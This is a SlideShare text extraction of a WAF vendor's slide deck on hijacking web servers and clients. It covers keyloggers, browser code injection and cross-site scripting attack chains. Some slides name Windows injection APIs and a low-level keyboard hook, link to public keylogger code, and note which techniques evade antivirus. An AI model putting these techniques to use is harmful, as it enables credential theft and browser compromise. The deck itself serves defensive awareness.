SlideShare a Scribd company logo

Renaud Bido & Mohammad Shams - Hijacking web servers & clients

Download as PPT, PDF
N
nooralmousa

The document discusses threats from hijacking web servers and clients, including keyloggers, browser compromise, cross-site scripting (XSS) attacks, and real-world examples of XSS exploitation. It also provides an overview of DenyAll, a French web application firewall vendor, including their clients, partners, and global presence.

1 of 30
Hijacking Web Servers & Clients New generation threats and mitigation Renaud Bidou - CTO Mohammad ShAms – Director, ME Operations
DenyAll & RECRO-NET French WAF vendor pioneer since 2001 Headquarter – Paris More than 200+ large clients all over the World 40% of EurostoXX 50 35% CAC40 Partnership with major players RECRO-NET ( Middle-East, Central Europe ) HP ( Iberia, South America ) British Telecom, Orange Business Services ( Western Europe, North America, APAC ) Recently listed as prime European WAF player by Forrester “ Web Application Firewall : 2010 And Beyond’’  - Chenxi Wang – februrary 2010
DenyAll in France
DenyAll WorldWide DIRF – SOCIETE GENERALE – EGE - CNSS – etc. SOCIETE GENERALE ANSI, ZITOUNA BANK – MINISTERE INTERIEUR - etc. SOCIETE GENERALE, etc. SH&Co, etc. BNPP, etc. SOCIETE GENERALE, etc. ACCOR - SOCIETE GENERALE - AREVA – etc. Accor, etc. BNP PARIBAS INSURANCE - ACCOR – etc. BNPP Insurance, etc. BNPP Insurance, etc. BNPP Insurance, etc. BNPP, etc. IP LIMITED, etc. SOCIETE GENERALE LUX – EBRC - CACEIS – etc. DANSKE BANK – KOPENHAGEN-FUR – etc. AKTIA BANK, etc. SENTOR – SVERIGE – etc TOYOTA BANK – etc. SITEL FRIBOURG - BNP PARIBAS CH - TOTAL SA – SOCIETE GENERALE PB – STIHL – IWB – etc. GROUPAMA – TDN – BT – IB SALUT – SATEC CANTABRIA – JUNTA DE EXTREMADURA – etc. ARAG-IT – BASF-IT – ARAGO – UNIONINVEST – BROSE – BSH – ENDRESS-HAUSER – NETCONSULT – HELMICH – STADTWERKE – INVIK-BANK – JULIUS-BAR-BANK – MARKANT – BIT – STIHL – TECHEM – THURINGER – ATOS WORLDLINE – etc. BNP PARIBAS UK - ARVAL UK – etc. . LA POSTE – DZ BANK – PETERCAM -etc INPS, etc
Threats Overview
Why Application Security ? 75% of all attacks are directed to the Web applications layer 2/3 of all Web applications are vulnerable In the first half 2010 web application vulnerabilities have reached 50 per cent of all code flaws reported. Most web site owners fail to scan effectively for the common flaws. Application patching is much slower than Operating System patching.
Web Attacks Targets & Impacts Information Leak Credentials Theft Identity Theft Authorization Abuses Transaction Compromise Defacement Malware Planting Session Hijacking Denial of Service Bounce Password Guess Remote Control Data Theft Data Corruption Data Deletion Remote Control Persistent Injections Processes Corruption Data Interception Denial of Service Client Web Server Database Server Application Servers / Web Services
Hijacking Servers & Clients Information Leak Credentials Theft Identity Theft Authorization Abuses Transaction Compromise Defacement Malware Planting Session Hijacking Denial of Service Bounce Password Guess Remote Control Data Theft Data Corruption Data Deletion Remote Control Persistent Injections Processes Corruption Data Interception Denial of Service Client Web Server Database Server Application Servers / Web Services
Threats Keyloggers
What is a keylogger Program reporting every keystroke Can be stored on a file Can be sent over the network Recent Keyloggers add many more features Window names and field values Mouse activity reports Screenshots and “video”-like records Operating from the compromised computer Encryption is inefficient No detection possible from the server-side Applications can be seamlessly compromised
Example : A simple keylogger Really simple ~100 lines (including comments) Based on common windows techniques SetWindowsHookEx(WH_KEYBOARD_LL,…) Public Code at : http://batcheur.tuxfamily.org/?p=16 Really efficient Runs fine on windows 7 (with UAC) Undetected by anti-viruses
Example : A simple keylogger
Threats Browsers Compromise
Code Injection Makes a process execute arbitrary code This process may be your browser Most common techniques SetWindowsHookEx Seen before, undetected CreateRemoteThreadEx & ( LoadLibrary | WriteProcessMemory) The most basic, detected and blocked SetThreadContext Relies on the DebugActiveProcess API Undetected, requires debug rights Widely documented… and used.
Browser Internals NTDLL.DLL KERNEL32.DLL USER32.DLL WININET.DLL URLMON.DLL MSHTML.DLL SHDOCVW.DLL BROWSEUI.DLL IEXPLORE.EXE Tab 1 Tab n IE user interface Bars, menus etc. Browser Control Navigation, history Exposes ActiveX interface Rendering MIME handling Code download Security IP Handler HTTP & FTP Windows UI Handles components Base API Calls NTDLL API Native API OS user-mode components ~200.000 function calls at IE launch You cannot monitor everything
Browser Attack Surface WININET.DLL URLMON.DLL MSHTML.DLL SHDOCVW.DLL BROWSEUI.DLL IEXPLORE.EXE Tab 1 Tab n Control navigation Control display Alter security policy Communicate…
An example Legitimate action Bank client JV (account 5204320422040001) Transfer 100 $ to bank client JM (5204320422040003) Malware injected into the browser Modifies content Founds transferred to bank user JC (5204320422040005)
Example : A simple keylogger
Threats Servers Compromise
What is Cross-Site Scripting Client-Side executed code injection A variant of HTML injections Based on Javascript code execution Two possible vectors Volatile XSS: generated through a malicious link Persistent XSS: malicious code is stored on the server Oldy but goody In the wild for more than 10 years Improved together with browser & Javascript capabilties
Impacts of XSS Full control of compromised browser through Javascript Cookie theft Information gathering regarding the client browser Redirection to alternate/concurrent/malicious site Portscan from the client Proxy on client’s network Flashmob DDoS Exploitation of Javascript capabilities Propagation thanks to Javascript web transactions capabilities Dynamic/Polymorphic code generation
Dangers of XSS Hard to detect Volatile XSS can only be detected through log file analysis Persitent XSS tracking getting more complicated with polymorphic code Numerous advanced Javascript obfuscation techniques More and more powerful Complete control of remote browsers Networking operations (see CSRF) Next generation of botnets Considered as the buffer overflow of the beginning of teh 21st century Unrecognized Most people think XSS is limited to cookie theft Bang. You’re dead.
101 XSS exploitation Usual PoC Inject <script>alert(‘XSS’)</script> Volatile and harmless XSS Used in most pentest Generates a popup in the « compromised » browser
Real XSS Exploitation Method Up to 4 players game The Hacker : the very bad guy The Goat : XSS vulnerable website The Victim : innocent user which browser will be compromised The Relay : a compromised or malicious website (optional) 3 players games rules The Hacker finds an XSS vulnerability on The Goat and exploits it Designs a script which will be executed on The Victim The Victim goes to the compromised page in The Goat Via malicious link (volatile) Directly on the page (persistent) The script is executed by The Victim Script may enforce the connection to The Relay to send back information
4 players game schema 1 . Hacker compromises Relay 2 . Hacker exploits XSS vulnerability 3 . Victim goes on compromised page 4 . Malicious Javascript is loaded on Victim 6 . Victim sends information to Relay 7 . Information sent back to Hacker 5 . Victim executes Javascript 8 . Relay sends new commands to Victim
PoC – The XSS Popup Command sent to the client: alert(« Gotcha »)
Portscan A Javascript Porstcanner is loaded in an invisible iFrame Victim performs the scan Results are sent through a request Made in the invisible iFrame Collected on the malicious server Victims sees nothing Portscan victim doesn’t have any clue regarding the real attacker
Redirection The victim is silently redirected to another web page Could be a similar page Used to steal authentication credentials Could be a competitve Made in the invisible iFrame Collected on the malicious server Victims sees nothing Portscan victim doesn’t have any clue regarding the real attacker
Thank you for your valuable time Q&A
(Distributor for Middle East & SE Europe ) 2702A Business Central Towers Dubai Internet City, PO. Box: 503012 Dubai, United Arab Emirates Tel: 04-3754306 E-mail: middle-east@recro-net.com www.recro-net.com

More Related Content

Renaud Bido & Mohammad Shams - Hijacking web servers & clients

  • 1. Hijacking Web Servers & Clients New generation threats and mitigation Renaud Bidou - CTO Mohammad ShAms – Director, ME Operations
  • 2. DenyAll & RECRO-NET French WAF vendor pioneer since 2001 Headquarter – Paris More than 200+ large clients all over the World 40% of EurostoXX 50 35% CAC40 Partnership with major players RECRO-NET ( Middle-East, Central Europe ) HP ( Iberia, South America ) British Telecom, Orange Business Services ( Western Europe, North America, APAC ) Recently listed as prime European WAF player by Forrester “ Web Application Firewall : 2010 And Beyond’’  - Chenxi Wang – februrary 2010
  • 4. DenyAll WorldWide DIRF – SOCIETE GENERALE – EGE - CNSS – etc. SOCIETE GENERALE ANSI, ZITOUNA BANK – MINISTERE INTERIEUR - etc. SOCIETE GENERALE, etc. SH&Co, etc. BNPP, etc. SOCIETE GENERALE, etc. ACCOR - SOCIETE GENERALE - AREVA – etc. Accor, etc. BNP PARIBAS INSURANCE - ACCOR – etc. BNPP Insurance, etc. BNPP Insurance, etc. BNPP Insurance, etc. BNPP, etc. IP LIMITED, etc. SOCIETE GENERALE LUX – EBRC - CACEIS – etc. DANSKE BANK – KOPENHAGEN-FUR – etc. AKTIA BANK, etc. SENTOR – SVERIGE – etc TOYOTA BANK – etc. SITEL FRIBOURG - BNP PARIBAS CH - TOTAL SA – SOCIETE GENERALE PB – STIHL – IWB – etc. GROUPAMA – TDN – BT – IB SALUT – SATEC CANTABRIA – JUNTA DE EXTREMADURA – etc. ARAG-IT – BASF-IT – ARAGO – UNIONINVEST – BROSE – BSH – ENDRESS-HAUSER – NETCONSULT – HELMICH – STADTWERKE – INVIK-BANK – JULIUS-BAR-BANK – MARKANT – BIT – STIHL – TECHEM – THURINGER – ATOS WORLDLINE – etc. BNP PARIBAS UK - ARVAL UK – etc. . LA POSTE – DZ BANK – PETERCAM -etc INPS, etc
  • 6. Why Application Security ? 75% of all attacks are directed to the Web applications layer 2/3 of all Web applications are vulnerable In the first half 2010 web application vulnerabilities have reached 50 per cent of all code flaws reported. Most web site owners fail to scan effectively for the common flaws. Application patching is much slower than Operating System patching.
  • 7. Web Attacks Targets & Impacts Information Leak Credentials Theft Identity Theft Authorization Abuses Transaction Compromise Defacement Malware Planting Session Hijacking Denial of Service Bounce Password Guess Remote Control Data Theft Data Corruption Data Deletion Remote Control Persistent Injections Processes Corruption Data Interception Denial of Service Client Web Server Database Server Application Servers / Web Services
  • 8. Hijacking Servers & Clients Information Leak Credentials Theft Identity Theft Authorization Abuses Transaction Compromise Defacement Malware Planting Session Hijacking Denial of Service Bounce Password Guess Remote Control Data Theft Data Corruption Data Deletion Remote Control Persistent Injections Processes Corruption Data Interception Denial of Service Client Web Server Database Server Application Servers / Web Services
  • 10. What is a keylogger Program reporting every keystroke Can be stored on a file Can be sent over the network Recent Keyloggers add many more features Window names and field values Mouse activity reports Screenshots and “video”-like records Operating from the compromised computer Encryption is inefficient No detection possible from the server-side Applications can be seamlessly compromised
  • 11. Example : A simple keylogger Really simple ~100 lines (including comments) Based on common windows techniques SetWindowsHookEx(WH_KEYBOARD_LL,…) Public Code at : http://batcheur.tuxfamily.org/?p=16 Really efficient Runs fine on windows 7 (with UAC) Undetected by anti-viruses
  • 12. Example : A simple keylogger
  • 14. Code Injection Makes a process execute arbitrary code This process may be your browser Most common techniques SetWindowsHookEx Seen before, undetected CreateRemoteThreadEx & ( LoadLibrary | WriteProcessMemory) The most basic, detected and blocked SetThreadContext Relies on the DebugActiveProcess API Undetected, requires debug rights Widely documented… and used.
  • 15. Browser Internals NTDLL.DLL KERNEL32.DLL USER32.DLL WININET.DLL URLMON.DLL MSHTML.DLL SHDOCVW.DLL BROWSEUI.DLL IEXPLORE.EXE Tab 1 Tab n IE user interface Bars, menus etc. Browser Control Navigation, history Exposes ActiveX interface Rendering MIME handling Code download Security IP Handler HTTP & FTP Windows UI Handles components Base API Calls NTDLL API Native API OS user-mode components ~200.000 function calls at IE launch You cannot monitor everything
  • 16. Browser Attack Surface WININET.DLL URLMON.DLL MSHTML.DLL SHDOCVW.DLL BROWSEUI.DLL IEXPLORE.EXE Tab 1 Tab n Control navigation Control display Alter security policy Communicate…
  • 17. An example Legitimate action Bank client JV (account 5204320422040001) Transfer 100 $ to bank client JM (5204320422040003) Malware injected into the browser Modifies content Founds transferred to bank user JC (5204320422040005)
  • 18. Example : A simple keylogger
  • 20. What is Cross-Site Scripting Client-Side executed code injection A variant of HTML injections Based on Javascript code execution Two possible vectors Volatile XSS: generated through a malicious link Persistent XSS: malicious code is stored on the server Oldy but goody In the wild for more than 10 years Improved together with browser & Javascript capabilties
  • 21. Impacts of XSS Full control of compromised browser through Javascript Cookie theft Information gathering regarding the client browser Redirection to alternate/concurrent/malicious site Portscan from the client Proxy on client’s network Flashmob DDoS Exploitation of Javascript capabilities Propagation thanks to Javascript web transactions capabilities Dynamic/Polymorphic code generation
  • 22. Dangers of XSS Hard to detect Volatile XSS can only be detected through log file analysis Persitent XSS tracking getting more complicated with polymorphic code Numerous advanced Javascript obfuscation techniques More and more powerful Complete control of remote browsers Networking operations (see CSRF) Next generation of botnets Considered as the buffer overflow of the beginning of teh 21st century Unrecognized Most people think XSS is limited to cookie theft Bang. You’re dead.
  • 23. 101 XSS exploitation Usual PoC Inject <script>alert(‘XSS’)</script> Volatile and harmless XSS Used in most pentest Generates a popup in the « compromised » browser
  • 24. Real XSS Exploitation Method Up to 4 players game The Hacker : the very bad guy The Goat : XSS vulnerable website The Victim : innocent user which browser will be compromised The Relay : a compromised or malicious website (optional) 3 players games rules The Hacker finds an XSS vulnerability on The Goat and exploits it Designs a script which will be executed on The Victim The Victim goes to the compromised page in The Goat Via malicious link (volatile) Directly on the page (persistent) The script is executed by The Victim Script may enforce the connection to The Relay to send back information
  • 25. 4 players game schema 1 . Hacker compromises Relay 2 . Hacker exploits XSS vulnerability 3 . Victim goes on compromised page 4 . Malicious Javascript is loaded on Victim 6 . Victim sends information to Relay 7 . Information sent back to Hacker 5 . Victim executes Javascript 8 . Relay sends new commands to Victim
  • 26. PoC – The XSS Popup Command sent to the client: alert(« Gotcha »)
  • 27. Portscan A Javascript Porstcanner is loaded in an invisible iFrame Victim performs the scan Results are sent through a request Made in the invisible iFrame Collected on the malicious server Victims sees nothing Portscan victim doesn’t have any clue regarding the real attacker
  • 28. Redirection The victim is silently redirected to another web page Could be a similar page Used to steal authentication credentials Could be a competitve Made in the invisible iFrame Collected on the malicious server Victims sees nothing Portscan victim doesn’t have any clue regarding the real attacker
  • 29. Thank you for your valuable time Q&A
  • 30. (Distributor for Middle East & SE Europe ) 2702A Business Central Towers Dubai Internet City, PO. Box: 503012 Dubai, United Arab Emirates Tel: 04-3754306 E-mail: middle-east@recro-net.com www.recro-net.com